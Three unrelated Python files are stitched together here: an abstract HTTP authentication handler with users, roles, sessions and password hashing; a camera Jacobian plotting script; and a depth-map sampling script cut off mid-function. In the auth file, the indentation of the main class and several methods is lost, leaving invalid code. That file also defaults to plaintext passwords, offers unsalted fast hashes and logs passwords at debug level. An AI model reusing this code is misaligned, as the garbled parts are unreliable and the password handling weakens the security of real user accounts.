        return self._dict_data.keys()

    def values(self):
        return self._dict_data.values()
class User(ReadOnlyDict):
    '''Abstract class for a user'''

    def __init__(self,
                 username=None,
                 password=None,
                 roles=None):
        '''
        - roles should be a list of Roles or a list of strings

        Note: the password default was restored to None; the previous
        source contained the invalid placeholder token ``<PASSWORD>``
        (a credential-scrubbing artifact) which is a syntax error.
        '''
        # Normalize roles: plain strings are wrapped in Role objects so
        # downstream code can rely on a uniform list of Role instances.
        _roles = []
        if roles is not None:
            for r in roles:
                if is_str(r):
                    _roles.append(Role(r))
                else:
                    _roles.append(r)
        self.username = username
        self.password = password
        self.roles = _roles
class Role(ReadOnlyDict):
    '''Abstract class for a user role'''

    def __init__(self, name=None):
        # name: the role's identifier (User wraps plain strings in Role
        # instances using this parameter).
        self.name = name
class Session(ReadOnlyDict):
    '''Abstract class for a session'''

    def __init__(self,
                 user=None,
                 token=None,
                 expiry=None):
        '''
        - user should be an instance of User
        - expiry should be one of:
          1) an int or float as UTC seconds since Unix epoch
          2) datetime object
        '''
        self.user = user
        self.token = token
        self.expiry = expiry

    def has_expired(self):
        '''Return True if the session's expiry time has passed.

        A session without an expiry never expires.
        '''
        deadline = self.expiry
        if deadline is None:
            return False
        # Normalize datetime deadlines to a UTC Unix timestamp before comparing.
        if isinstance(deadline, datetime):
            deadline = datetime_to_timestamp(deadline, to_utc=True)
        return deadline <= curr_timestamp(to_utc=True)
class BaseAuthHTTPRequestHandlerMeta(BaseMeta):
    '''Metaclass for BaseAuthHTTPRequestHandler

    Check the validity of class attributes and ensures the required
    password hashing modules are present.
    '''

    def __new__(cls, name, bases, attrs):
        # Placeholder so __check_attr can read it during class creation;
        # the real value is computed below and set via super().__setattr__
        # (bypassing this metaclass's validating __setattr__).
        attrs['_supported_hashes'] = []
        new_class = super().__new__(cls, name, bases, attrs)
        # A password type 'X' is supported when the class defines BOTH
        # _transform_password_X and _verify_password_X; None means plaintext.
        pwd_types = [None]
        prefT = '_transform_password_'
        prefV = '_verify_password_'
        for m in dir(new_class):
            if callable(getattr(new_class, m)) \
                    and m.startswith(prefT):
                ptype = m[len(prefT):]
                if hasattr(new_class, '{}{}'.format(prefV, ptype)):
                    pwd_types.append(ptype)
        super().__setattr__(new_class, '_supported_hashes', pwd_types)
        # Validate/coerce every attribute declared on the new class; only
        # re-assign when __check_attr actually transformed the value.
        for key, value in attrs.items():
            new_val = new_class.__check_attr(key, value)
            if new_val is not value:
                setattr(new_class, key, new_val)
        return new_class

    def __setattr__(self, key, value):
        # Validate attributes assigned to the class after creation as well.
        new_val = self.__check_attr(key, value)
        # super() doesn't work here in python 2, see:
        # https://github.com/PythonCharmers/python-future/issues/267
        super(BaseAuthHTTPRequestHandlerMeta, self).__setattr__(
            key, new_val)

    def __check_attr(cls, key, value):
        '''Coerce and validate a single class attribute.

        Returns the (possibly transformed) value; raises TypeError when the
        value fails its declared requirement, and ImportError when the
        selected password hash type needs a missing optional module.
        '''
        # Small predicate helpers used in the requirements table below.
        def is_none(val):
            return val is None

        def is_one_of(val, sequence):
            return val in sequence

        def is_any_true(val, checkers):
            for c in checkers:
                if c(val):
                    return True
            return False

        # Attributes that are coerced to another type before validation.
        transformer = {
            '_can_create_users': OrderedDict,
        }
        # attribute name -> (checker, requirement passed to the checker)
        requirements = {
            '_JSON_params': (is_any_true, [is_none, is_seq_like]),
            '_pwd_type': (is_one_of, cls._supported_hashes),
            '_secrets': (is_any_true, [is_seq_like, is_map_like]),
            '_can_create_users': (is_any_true, [is_map_like]),
            '_pwd_min_len': (isinstance, int),
            '_pwd_min_charsets': (isinstance, int),
            '_is_SSL': (isinstance, bool),
            '_cookie_name': (is_any_true, [is_str]),
            '_cookie_len': (isinstance, int),
            '_cookie_lifetime': (isinstance, (int, type(None))),
            '_SameSite': (is_one_of, [None, 'lax', 'strict']),
            '_jwt_lifetime': (isinstance, int),
            '_send_new_refresh_token': (isinstance, bool),
            '_refresh_token_lifetime': (isinstance, int),
            '_refresh_token_len': (isinstance, int),
        }
        if key in transformer:
            try:
                value = transformer[key](value)
            except (ValueError, TypeError):
                raise TypeError('{} cannot be converted to {}'.format(
                    key, transformer[key].__name__))
        if key in requirements:
            checker, req = requirements[key]
            if not checker(value, req):
                raise TypeError('{} must be {}{}'.format(
                    key,
                    'one of ' if isinstance(req, list) else '',
                    req))
        # The chosen password hash type may need an optional third-party
        # backend; fail early with a clear ImportError instead of at runtime.
        if key == '_pwd_type':
            if value is not None and value.endswith('crypt'):
                try:
                    unix_hash
                except NameError:
                    raise ImportError(
                        'The passlib module is required for '
                        'unix hashes (*crypt)')
            if value == 'bcrypt':
                try:
                    import bcrypt
                except ImportError:
                    raise ImportError(
                        'The bcrypt module is required for '
                        'bcrypt hashes')
            elif value == 'scrypt':
                try:
                    import scrypt
                except ImportError:
                    raise ImportError(
                        'The scrypt module is required '
                        'for scrypt hashes')
        return value
class BaseAuthHTTPRequestHandler(
with_metaclass(BaseAuthHTTPRequestHandlerMeta,
BaseHTTPRequestHandler, object)):
'''Implements authentication in an abstract way
Incomplete, must be inherited, and the child class must define
methods for storing/getting/updating users and sessions as well as
creating and sending tokens.
Class attributes:
- _JSON_params: a list of keys to send with every JSON response.
If any have not been set, they will be set as None (null).
Default is None, meaning do not send a JSON response (but an
HTML one)
- _secrets: can be either:
1) A simple filter: an iterable of absolute or relative paths
which require authentication:
- A path filter that begins with / is matched at the
beginning of the request path and must match until the end
or until another /
- Otherwise, the path filter is matched as a path component
(i.e. following a /) and again must match until the end
or until another /
- If no value in the list of path filters matches the
requested path, then anyone is granted access. Otherwise,
only authenticated users are granted access.
2) A more fine-grained filter: an OrderedDict (or equivalently,
a list of two-item tuples) where each key is a regex for
{method} {path} and each value is a list of allowed users or
roles (prefixed with '#').
A user is one of:
- a literal username, optionally preceded by '!' (to
negate or deny access)
- None (anyone, including unauthenticated)
- '*' (any authenticated user)
A role is a literal role name prefixed by '#', e.g. '#admin',
optionally preceded by '!' (to negate access).
- If no value in the list of secret path regexes matches the
requested path, then anyone is granted access. Otherwise,
the first (in order) regex that matched the requested path
determines if the user is allowed or not:
- It is allowed explicitly if {user} is given in the list
of users or #{role} is given for any of the user's roles
- It is denied explicitly if !{user} is given in the list
of users or !#{role} is given for any of the user's roles
- It is denied implicitly if the user is not in the list
and neither is '*' or None, and neither is any of their
roles.
- Checks are in the following order:
- Allowed implicitly by None (unauth)
- Allowed explicitly by username
- Denied explicitly by username
- Allowed explicitly by role
- Denied explicitly by role
- Allowed implicitly by *
- Denied implicitly (none of the above)
Example:
_secrets = [
# all authenticated users, except service, can access /foo
('^[A-Z]+ /foo(/|$)', ['*', '!service']),
# only users in the admin group can POST (POST /foo is
# still allowed for all other than service
('^POST ', ['#admin']),
# anyone can fetch /bar
('^GET /bar(/|$)', [None]),
# require authentication for all other pages
('.*', ['*']),
]
Default _secrets is [], i.e. no authentication required.
- _can_create_users: A dictionary, where every key is a user role
(<new_role>) and every value is a list of users or roles
(prefixed with '#') who are able to register users with role
<new_role>. As in _secrets, a username or role can be negated
with '!'.
- The role None as a key means the new user is assigned no
roles.
None and '*' in the list have the same meaning as explained in
_secrets.
- When a new user is to be registered with a set of roles, the
currently logged in user should be authorized to create users of
each of the given roles. Note that access to the /register
endpoint still needs to be granted via _secrets.
- Unlike _secrets, the keys (roles) are not regular expressions,
      but compared for literal equality. Also, if a user is to be
created with a role that isn't listed in _can_create_users,
access is denied, i.e. _can_create_users should list all
allowed roles and who is allowed to create users of that role.
Example:
_can_create_users = {
None: [None], # self-register with no role assignment
'service': ['admin'], # admins can create service accounts
'admin': ['admin'], # admins can create other admins
}
Default _can_create_users is {None: [None]}, i.e. self-register.
- _pwd_min_len: Minimum length of passwords. Default is 10.
- _pwd_min_charsets: Minimum number of character sets in
passwords. Default is 3.
- _pwd_type: the type (usually hash algorithm) to store passwords
in. Supported values are:
unsalted ones:
md5, sha1, sha256, sha512
salted ones (UNIX passwords):
md5_crypt, sha1_crypt, sha256_crypt, sha512_crypt, bcrypt,
scrypt
If a child class wants to extend these, it should define
_transform_password_{type} and _verify_password_{type}.
Default is None (plaintext).
    - _prune_sessions_every: Minimum number of seconds before we will
search for and remove expired sessions. It is checked before
every request, so if it is 0, then old sessions are searched for
      before every request. If it is None, we never search for old
      sessions. Either way, we check whether the requested session has
      expired, and if it has, we remove it.
'''
_JSON_params = None
_secrets = []
_can_create_users = {None: [None]}
_pwd_min_len = 10
_pwd_min_charsets = 3
_pwd_type = None
_prune_sessions_every = 0
__last_prune = curr_timestamp()
_endpoints = endpoints.Endpoint(
register={
'$allowed_methods': {'POST'},
},
changepwd={
'$allowed_methods': {'POST'},
},
login={
'$allowed_methods': {'POST'},
},
logout={
'$allowed_methods': {'GET', 'POST'},
},
)
    def __init__(self, *args, **kwargs):
        # parent's __init__ must be called at the end, since
        # SimpleHTTPRequestHandler's __init__ processes the request
        # and calls the handlers
        if self.__class__._prune_sessions_every is not None:
            # prune expired sessions at most once per interval
            next_check = self.__class__._prune_sessions_every \
                + self.__class__.__last_prune
            if next_check <= curr_timestamp():
                self.prune_old_sessions()
                self.__class__.__last_prune = curr_timestamp()
        super().__init__(*args, **kwargs)
################### Methods specific to authentication type
    def get_current_token(self):
        '''Should return the current token

        Abstract hook, specific to the authentication type.
        Child class should implement.
        '''
        raise NotImplementedError
    def set_session(self, session):
        '''Should ensure the token is sent in the response

        Abstract hook, specific to the authentication type.
        Child class should implement.
        '''
        raise NotImplementedError
    def unset_session(self, session):
        '''Should ensure the token is cleared client-side

        session is guaranteed to exist.
        Abstract hook, specific to the authentication type.
        Child class should implement.
        '''
        raise NotImplementedError
    @classmethod
    def generate_session(cls, user):
        '''Should return a new Session

        Abstract hook, specific to the authentication type.
        Child class should implement.
        '''
        raise NotImplementedError
################### Methods specific to storage type
    @classmethod
    def find_session(cls, token):
        '''Should return the Session corresponding to the token

        Abstract hook, specific to the storage type.
        Child class should implement.
        '''
        raise NotImplementedError
    @classmethod
    def get_all_sessions(cls):
        '''Should return a list of Sessions

        Abstract hook, specific to the storage type.
        Child class should implement.
        '''
        raise NotImplementedError
    @classmethod
    def add_session(cls, session):
        '''Should record the Session

        Abstract hook, specific to the storage type.
        Child class should implement.
        '''
        raise NotImplementedError
    @classmethod
    def rm_session(cls, session):
        '''Should delete the Session

        session is guaranteed to exist.
        Abstract hook, specific to the storage type.
        Child class should implement.
        '''
        raise NotImplementedError
    @classmethod
    def find_user(cls, username):
        '''Should return the User for that username

        Abstract hook, specific to the storage type.
        Child class should implement.
        '''
        raise NotImplementedError
    @classmethod
    def create_user(cls, username, password, roles=None):
        '''Should create and return a new User

        Abstract hook, specific to the storage type.
        Child class should implement.
        '''
        raise NotImplementedError
    @classmethod
    def update_user(cls, user):
        '''Called after changing user's attributes

        Should perform any necessary post-update actions.
        Abstract hook, specific to the storage type.
        Child class should implement.
        '''
        raise NotImplementedError
    def send_response_auth(self, error=None):
        '''Sends the response to one of our endpoints

        - If error is given, it must be a tuple of (code, message)
        - If the _JSON_params class attribute is set, we call
          send_as_json (if error is given the message is sent as an
          "error" key). TODO customise the error key?
        - Otherwise we call send_response_goto
        '''
        if self.__class__._JSON_params is not None:
            # make sure every advertised JSON key is present (null if unset)
            for k in self.__class__._JSON_params:
                if k not in self.saved_params():
                    self.save_param(k, None)
            self._send_response_auth_json(error)
        else:
            self._send_response_auth_plain(error)
def _send_response_auth_plain(self, error):
if error is not None:
self.send_error(code=error[0], explain=error[1])
else:
self.send_response_goto()
def _send_response_auth_json(self, error):
code = 200
if error is not None:
self.save_param('error', error[1])
code = error[0]
self.send_as_json(code=code)
    def denied(self):
        '''Returns 401 if resource is secret and no authentication'''
        requested = '{} {}'.format(self.command, self.pathname)
        secrets = self.__class__._secrets
        try:
            # fine-grained filter: _secrets is a mapping (or list of
            # pairs) of "METHOD /path" regexes to ACLs
            secrets = OrderedDict(self.__class__._secrets)
        except ValueError:
            # simple filter: _secrets is an iterable of path components;
            # build a single OR-ed regex requiring any authenticated
            # user ('*'), matched against the bare pathname
            requested = self.pathname
            secrets = OrderedDict([(
                ('(^|/)'
                 '{}'  # secrets joined in an OR
                 '(/|$)'.format('|'.join(secrets))),
                ['*'])])
        # login/logout are always reachable so users can (re)authenticate
        if self.pathname != '{}/login'.format(self.endpoint_prefix) \
                and self.pathname != '{}/logout'.format(
                    self.endpoint_prefix) \
                and not self.is_authorized(
                    requested, secrets, default=True, is_regex=True):
            return (401,)
        return super().denied()
    def is_authorized(
            self, val, acl_map, default=False, is_regex=True):
        '''Returns True or False if val is allowed by acl_map

        - acl_map is a dict-like reference--list of user/roles pairs.
        - val is the value to be compared to each key in acl_map.
        - If is_regex is True, then reference is a regex for val,
          otherwise equality is checked.
        - The first key that matches val decides the outcome; checks
          within its ACL follow the precedence documented on the class
          (None, explicit user allow/deny, role allow/deny, '*').
        '''
        def is_equal(ref, val):
            # equality comparator used when is_regex is False;
            # None only matches None
            return (ref is None and val is None) or ref == val

        logger.debug('Checking authorization for {}'.format(val))
        user = None
        session = self.get_current_session()
        if session is not None:
            user = session.user
        if is_regex:
            comparator = re.search
        else:
            comparator = is_equal
        for ref, acls in acl_map.items():
            logger.debug('{} is allowed for {}'.format(ref, acls))
            if comparator(ref, val):
                if None in acls:
                    logger.debug('Anyone allowed')
                    return True
                if user is None:
                    logger.debug('Unauth denied')
                    return False
                if '!{}'.format(user.username) in acls:
                    logger.debug('Explicitly denied')
                    return False
                if user.username in acls:
                    logger.debug('Explicitly allowed')
                    return True
                for r in user.roles:
                    if '!#{}'.format(r.name) in acls:
                        logger.debug('Explicitly denied by role')
                        return False
                    if '#{}'.format(r.name) in acls:
                        logger.debug('Explicitly allowed by role')
                        return True
                if '*' in acls:
                    logger.debug('Implicitly allowed')
                    return True
                logger.debug('Implicitly denied')
                return False
        logger.debug('No match, defaulting to {}'.format(default))
        return default
    def get_current_session(self):
        '''Returns the current Session if still valid

        If it has expired, it removes it and returns None.
        This implementation relies on the session token in the request
        being saved by us. For authentication schemes which rely on
        stateless tokens (e.g. JWT), override this method and return
        a Session with a None token (but valid User and expiry).
        '''
        session = self.find_session(self.get_current_token())
        if session is None:
            logger.debug('No session')
            return None
        if session.has_expired():
            # lazily evict: expired sessions are removed both from the
            # store and from the client the next time they are seen
            logger.debug('Session {} has expired'.format(
                session.token))
            self.rm_session(session)
            self.unset_session(session)
            return None
        logger.debug('Found session for {}'.format(
            session.user.username))
        return session
def expire_current_session(self):
'''Invalidates the session server-side'''
session = self.get_current_session()
if session is None or session.token is None:
return
self.rm_session(session)
self.unset_session(session)
def new_session(self, user):
'''Invalidates the old session and generates a new one'''
self.expire_current_session()
session = self.generate_session(user)
if session.expiry:
logger.debug('Session {} expires at {}'.format(
session.token, session.expiry))
self.add_session(session)
self.set_session(session)
return session
    @classmethod
    def load_users_from_file(cls, userfile, plaintext=True):
        '''Adds users from the userfile

        - userfile can be a string (filename) or a file handle
        - The file contains one username:password[:roles] per line.
        - If roles is given, it is comma-separated
        - Neither username, nor password can be empty.
        - If plaintext is True, then the password is checked against
          the policy and hashed according to the _pwd_type class
          attribute; otherwise it is saved as is (the hashing
          algorithm must correspond to _pwd_type)
        '''
        def process_line(line):
            def unpack(a, b, c, *d):  # python 2
                return a, b, c

            # pad with '::' so lines without a roles field still unpack
            # into three values; extra fields are ignored
            user, pwd, roles = unpack(*'{}::'.format(
                line.rstrip('\r\n')).split(':'))
            return (user, pwd, [r.strip(' ')
                                for r in roles.split(',') if r != ''])

        with open_path(userfile) as (ufile, _):
            for line in ufile:
                username, password, roles = process_line(line)
                try:
                    cls.new_user(username, password, roles=roles,
                                 plaintext=plaintext)
                except (UserAlreadyExistsError, InvalidUsernameError,
                        BadPasswordError) as e:
                    # log and continue with the remaining lines
                    logger.error('{}'.format(str(e)))
@classmethod
def prune_old_sessions(cls):
'''Removes expired sessions'''
logger.debug('Pruning old sessions')
sessions = cls.get_all_sessions()
for s in sessions:
if s.has_expired():
logger.debug('Removing session {}'.format(s.token))
cls.rm_session(s)
    @classmethod
    def new_user(
            cls, username, password, roles=None, plaintext=True):
        '''Creates a user with the given password and roles

        - If plaintext is True, then the password is checked against
          the policy and hashed according to the _pwd_type class
          attribute; otherwise it is saved as is (the hashing
          algorithm must correspond to _pwd_type)
        Raises InvalidUsernameError, UserAlreadyExistsError or
        BadPasswordError.
        Returns the new user.
        '''
        if not username:
            raise InvalidUsernameError(username)
        if cls.find_user(username):
            raise UserAlreadyExistsError(username)
        if plaintext:
            if not cls.password_is_strong(password):
                raise BadPasswordError(username)
            password = cls.transform_password(password)
        # NOTE(review): this logs the stored password (plaintext when
        # _pwd_type is None) at debug level — confirm that is acceptable
        logger.debug('Creating user {}:{} (roles: {})'.format(
            username, password, roles))
        return cls.create_user(username, password, roles)
@classmethod
def change_password(
cls, user_or_username, password, plaintext=True):
'''Changes the password of username (no validation of current)
- user_or_username is an instance of User or a string
- If plaintext is True, then the password is checked against
the policy and hashed according to the _pwd_type class
attribute; otherwise it is saved as is (the hashing
algorithm must correspond to _pwd_type)
'''
user = user_or_username
if not isinstance(user, User):
user = cls.find_user(user)
if user is None:
raise NoSuchUserError(user.username)
if plaintext:
if not cls.password_is_strong(password):
raise BadPasswordError(user.username)
password = cls.transform_password(password)
logger.debug('Changing password for user {}:{}'.format(
user.username, password))
user.password = password
cls.update_user(user)
def authenticate(self):
'''Returns the User if successful login, otherwise None
username and password taken from request parameters
'''
username = self.get_param('username')
password = self.get_param('password')
user = self.find_user(username)
if user is None:
logger.debug('No such user {}'.format(username))
return None
if self.verify_password(user, password):
return user
return None
@classmethod
def verify_password(cls, user, password):
'''Returns True or False if user's password is as given
Uses the algorithm is given in _pwd_type (class attribute)
'''
if cls._pwd_type is None:
return user.password == password
verifier = getattr(
cls, '_verify_password_{}'.format(cls._pwd_type))
return verifier(plain=password, hashed=user.password)
@classmethod
def transform_password(cls, password):
'''Returns the password hashed according to the setting
Uses the algorithm is given in _pwd_type (class attribute)
'''
if cls._pwd_type is None:
return password
transformer = getattr(
cls, '_transform_password_{}'.format(cls._pwd_type))
return transformer(password)
    @staticmethod
    def _verify_password_md5_crypt(plain, hashed):
        # salted UNIX md5-crypt, delegated to passlib
        return unix_hash.md5_crypt.verify(plain, hashed)
    @staticmethod
    def _verify_password_sha1_crypt(plain, hashed):
        # salted UNIX sha1-crypt, delegated to passlib
        return unix_hash.sha1_crypt.verify(plain, hashed)
    @staticmethod
    def _verify_password_sha256_crypt(plain, hashed):
        # salted UNIX sha256-crypt, delegated to passlib
        return unix_hash.sha256_crypt.verify(plain, hashed)
    @staticmethod
    def _verify_password_sha512_crypt(plain, hashed):
        # salted UNIX sha512-crypt, delegated to passlib
        return unix_hash.sha512_crypt.verify(plain, hashed)
    @staticmethod
    def _verify_password_bcrypt(plain, hashed):
        # bcrypt, delegated to passlib (requires the bcrypt backend)
        return unix_hash.bcrypt.verify(plain, hashed)
    @staticmethod
    def _verify_password_scrypt(plain, hashed):
        # scrypt, delegated to passlib (requires the scrypt backend)
        return unix_hash.scrypt.verify(plain, hashed)
    @staticmethod
    def _verify_password_md5(plain, hashed):
        # unsalted MD5 hex digest comparison
        # NOTE(review): not a constant-time compare
        return hashlib.md5(
            plain.encode('utf-8')).hexdigest() == hashed
    @staticmethod
    def _verify_password_sha1(plain, hashed):
        # unsalted SHA-1 hex digest comparison
        return hashlib.sha1(
            plain.encode('utf-8')).hexdigest() == hashed
    @staticmethod
    def _verify_password_sha256(plain, hashed):
        # unsalted SHA-256 hex digest comparison
        return hashlib.sha256(
            plain.encode('utf-8')).hexdigest() == hashed
    @staticmethod
    def _verify_password_sha512(plain, hashed):
        # unsalted SHA-512 hex digest comparison
        return hashlib.sha512(
            plain.encode('utf-8')).hexdigest() == hashed
    @staticmethod
    def _transform_password_md5_crypt(password):
        # salted UNIX md5-crypt hash via passlib
        return unix_hash.md5_crypt.hash(password)
    @staticmethod
    def _transform_password_sha1_crypt(password):
        # salted UNIX sha1-crypt hash via passlib
        return unix_hash.sha1_crypt.hash(password)
    @staticmethod
    def _transform_password_sha256_crypt(password):
        # salted UNIX sha256-crypt hash via passlib
        return unix_hash.sha256_crypt.hash(password)
    @staticmethod
    def _transform_password_sha512_crypt(password):
        # salted UNIX sha512-crypt hash via passlib
        return unix_hash.sha512_crypt.hash(password)
    @staticmethod
    def _transform_password_bcrypt(password):
        # bcrypt hash via passlib (requires the bcrypt backend)
        return unix_hash.bcrypt.hash(password)
    @staticmethod
    def _transform_password_scrypt(password):
        # scrypt hash via passlib (requires the scrypt backend)
        return unix_hash.scrypt.hash(password)
    @staticmethod
    def _transform_password_md5(password):
        # unsalted MD5 hex digest
        return hashlib.md5(password.encode('utf-8')).hexdigest()
    @staticmethod
    def _transform_password_sha1(password):
        # unsalted SHA-1 hex digest
        return hashlib.sha1(password.encode('utf-8')).hexdigest()
    @staticmethod
    def _transform_password_sha256(password):
        # unsalted SHA-256 hex digest
        return hashlib.sha256(password.encode('utf-8')).hexdigest()
    @staticmethod
    def _transform_password_sha512(password):
        # unsalted SHA-512 hex digest
        return hashlib.sha512(password.encode('utf-8')).hexdigest()
@classmethod
def password_is_strong(cls, password):
'''Returns True or False if password conforms to policy'''
return (password is not None
and len(password) >= cls._pwd_min_len
and num_charsets(password) >= cls._pwd_min_charsets)
    def do_register(self):
        '''Creates a new user

        Returns the user on success and None on failure
        '''
        username = self.get_param('username')
        password = self.get_param('password')
        roles = self.get_param('roles')
        # for JSON requests roles could be a list already,
        # otherwise accept a comma-separated string
        if is_str(roles):
            roles = [r.strip(' ') for r in roles.split(',')]
        if roles is None:
            roles = []
        # the logged-in user must be authorized (via _can_create_users)
        # for every requested role
        # NOTE(review): an empty roles list skips this loop entirely, so
        # role-less registration is never checked against
        # _can_create_users[None] — confirm this is intended
        for r in roles:
            if not self.is_authorized(
                    r,
                    self.__class__._can_create_users,
                    default=False,
                    is_regex=False):
                self.send_response_auth(
                    error=(401,
                           ('You cannot create '
                            'a user of role {}').format(r)))
                return None
        try:
            user = self.new_user(username, password, roles)
        except (UserAlreadyExistsError, InvalidUsernameError,
                BadPasswordError) as e:
            self.send_response_auth(error=(400, str(e)))
            return None
        # log the new user in right away
        self.new_session(user)
        self.send_response_auth()
        return user
def do_changepwd(self):
'''Changes the password for the given username
Returns the user on success and None on failure
'''
user = self.authenticate()
if user is None:
self.send_response_auth(
error=(401, 'Username or password is wrong'))
return None
new_password = self.get_param('new_password')
try:
self.change_password(user, new_password, plaintext=True)
except BadPasswordError as e:
self.send_response_auth(error=(400, str(e)))
return None
self.new_session(user)
self.send_response_auth()
return user
def do_login(self):
'''Issues a random cookie and saves it
Returns the user on success and None on failure
'''
user = self.authenticate()
if user is None:
self.expire_current_session()
self.send_response_auth(
error=(401, 'Username or password is wrong'))
return None
self.new_session(user)
self.send_response_auth()
return user
    def do_logout(self):
        '''Clears the cookie from the browser and saved sessions

        Always succeeds. Returns True.
        '''
        self.expire_current_session()
        self.send_response_auth()
        return True
|
<reponame>linksdl/futuretec-project-self_driving_cars_projects
# imports
import numpy as np
import matplotlib
#matplotlib.use('wxagg') # change backend so that figure maximizing works on Mac as well
import matplotlib.pyplot as plt
class Camera:
    '''Camera sensor class including measurement matrix

    State x is indexed as [0]=x (depth), [1]=y, [2]=z (plus velocities),
    and the pinhole projection is
        h(x) = [c_i - f_i*y/x,  c_j - f_j*z/x].
    '''
    def __init__(self):
        self.f_i = 2095.5 # focal length i-coordinate
        self.f_j = 2095.5 # focal length j-coordinate
        self.c_i = 944.9 # principal point i-coordinate
        self.c_j = 640.2 # principal point j-coordinate

    def get_hx(self, x):
        '''Return the nonlinear measurement expectation h(x) as 2x1.'''
        hx = np.zeros((2,1))
        if x[0] == 0:
            raise NameError('Jacobian not defined for x[0]=0!')
        hx[0,0] = self.c_i - self.f_i * x[1]/x[0]
        # BUG FIX: project z with the depth x[0] (was x[2]/x[1]); this
        # matches the Jacobian below (H[1,0] = f_j*z/x^2, H[1,2] = -f_j/x)
        hx[1,0] = self.c_j - self.f_j * x[2]/x[0]
        return hx

    def get_H(self, x):
        '''Return the 2x6 Jacobian H of h(x) at the current x.'''
        H = np.matrix(np.zeros((2, 6)))
        if x[0] == 0:
            raise NameError('Jacobian not defined for x[0]=0!')
        H[0, 0] = self.f_i * x[1] / (x[0] * x[0])
        H[1, 0] = self.f_j * x[2] / (x[0] * x[0])
        # BUG FIX: d h[0] / d x[1] = -f_i/x[0] (the minus sign was
        # missing, breaking consistency with h(x))
        H[0, 1] = - self.f_i / x[0]
        H[1, 2] = - self.f_j / x[0]
        return H
def calc_Jacobian(x):
    '''Plot h(x) and its linear (Jacobian-based) approximation.

    Varies the depth component x[0] over [1, 50) and compares the
    nonlinear measurement function against the first-order Taylor
    expansion around the given x.
    NOTE: mutates the caller's x (x[0] is overwritten in the loop).
    '''
    # calculate Jacobian for x
    cam = Camera()
    H = cam.get_H(x)

    # init visualization
    fig, (ax1, ax2) = plt.subplots(1,2)
    plot_x = []
    plot_y1 = []
    plot_y2 = []
    lin_y1 = []
    lin_y2 = []

    # calculate Taylor series expansion point
    hx_orig = cam.get_hx(x)
    ax1.plot(x[0], hx_orig[0], marker='x', color='green', label='expansion point x')
    ax2.plot(x[0], hx_orig[1], marker='x', color='green', label='expansion point x')

    # calculate linear approximation at this point
    s1 = float(H[0,0]) # slope of tangent given by Jacobian H
    s2 = float(H[1,0])
    i1 = float(hx_orig[0] - s1*x[0]) # intercept i = y - s*x
    i2 = float(hx_orig[1] - s2*x[0])

    # calculate nonlinear measurement function h
    for px in range(1,50):
        x[0] = px
        hx = cam.get_hx(x)
        plot_x.append(px)
        plot_y1.append(hx[0])
        plot_y2.append(hx[1])
        lin_y1.append(s1*px + i1)
        lin_y2.append(s2*px + i2)

    # plot results
    ax1.plot(plot_x, plot_y1, color='blue', label='measurement function h')
    ax1.plot(plot_x, lin_y1, color='red', label='linear approximation H')
    ax2.plot(plot_x, plot_y2, color='blue', label='measurement function h')
    ax2.plot(plot_x, lin_y2, color='red', label='linear approximation H')

    # maximize window
    mng = plt.get_current_fig_manager()
    #mng.frame.Maximize(True)

    # legend
    ax1.legend(loc='center left', shadow=True, fontsize='large', bbox_to_anchor=(0.5, 0.1))
    ax1.set_xlabel('x [m]')
    ax1.set_ylabel('h(x) first component [px]')
    ax2.legend(loc='center left', shadow=True, fontsize='large', bbox_to_anchor=(0.5, 0.1))
    ax2.set_xlabel('x [m]')
    ax2.set_ylabel('h(x) second component [px]')
    plt.show()
#################
# define expansion point for Taylor series
# state column vector: [x, y, z, vx, vy, vz]
x = np.matrix([[10],
               [1],
               [-1],
               [0],
               [0],
               [0]])
calc_Jacobian(x)
|
<gh_stars>1-10
import sys
from PIL import Image
from pathlib import Path
import os
import shutil
import glob
import time
from dataloaders.kitti_loader import rgb_read
import cv2
import matplotlib.pyplot as plt
import numpy as np
"""
Choose samples from the gt (and not from vel, so we could have more options to samples from) and accumulate it.
Input:
current_pred_dir: the NNs prediction on the current phase images
depth_dir_path: velodyne from the current phase (based on the last phase predictions)
num_of_NN: the number of predictors
phase: current phase
budget: number of desired new samples
samp_method: PM or greedy (MAX)
metric: rmse or mae
is_test: True if we create maps for test set, otherwise False
save_probs_and_sample_maps: True if we want to save the probability maps (made from the variance map of all the predictions) & the new (only) sample maps - for debug & presentation
first_phase_rgbd: True if we are in K=1 & using rgbd input (the default is rgb only)
Outputs: None, besides saving the new velodyne_raw files for the next phase
"""
def create_custom_depth_maps(current_pred_dir, current_depth_dir, num_of_NN, phase, budget, samp_method, metric, is_test=False, save_probs_and_sample_maps=False, first_phase_rgbd=False):
    # --- select the path lists for the current split (val_select / train / test) ---
    if 'val_select' in current_pred_dir:  # dealing with val_select
        glob_d = "".join(current_depth_dir + '/depth_selection/val_selection_cropped/velodyne_raw/*.png')  # velodyne from the current phase (based on last phase's predictions)
        paths_d = sorted(glob.glob(glob_d))
        glob_gt = '../data_new/phase_1/mini_set_1/depth_selection/val_selection_cropped/groundtruth_depth/*.png'  # the gt aren't changing
        paths_gt = sorted(glob.glob(glob_gt))
        glob_d_pred = "".join(current_pred_dir + '/NN*/depth_selection/val_selection_cropped/velodyne_raw/*.png')  # the NNs prediction on the current phase's images
        paths_d_pred = sorted(glob.glob(glob_d_pred), key=lambda x: x.split('velodyne_raw/')[1])  # the sort makes sure same images in different NN* are arranged together
        predictions = num_of_NN
        num_different_images = int(len(paths_d_pred) / num_of_NN)
        assert len(paths_d_pred) == len(paths_gt) * num_of_NN, "create_custom_depth_maps: there are not enough predictions per image for val_select"
    elif is_test == False:  # dealing with train
        glob_d = "".join(current_depth_dir + '/data_depth_velodyne/train/*_sync/proj_depth/velodyne_raw/image_0[2,3]/*.png')
        paths_d = sorted(glob.glob(glob_d))
        glob_gt = "".join('../data_new/phase_1/mini_set_' + current_depth_dir.split('mini_set_')[1][0] + '/data_depth_annotated/train/*_sync/proj_depth/groundtruth/image_0[2,3]/*.png')
        paths_gt = sorted(glob.glob(glob_gt))
        glob_d_pred = "".join(current_pred_dir + '/NN*/data_depth_velodyne/train/*_sync/proj_depth/velodyne_raw/image_0[2,3]/*.png')
        paths_d_pred = sorted(glob.glob(glob_d_pred), key=lambda x: x.split('train/')[1])
        # NOTE(review): train uses one fewer prediction than the other
        # splits (num_of_NN - 1) — presumably the NN trained on this
        # mini-set is excluded; confirm
        predictions = num_of_NN - 1
        num_different_images = int(len(paths_d_pred) / (num_of_NN - 1))
        assert len(paths_d_pred) == len(paths_gt) * (num_of_NN - 1), "create_custom_depth_maps: there are not enough predictions per image for train"
    else:  # dealing with test
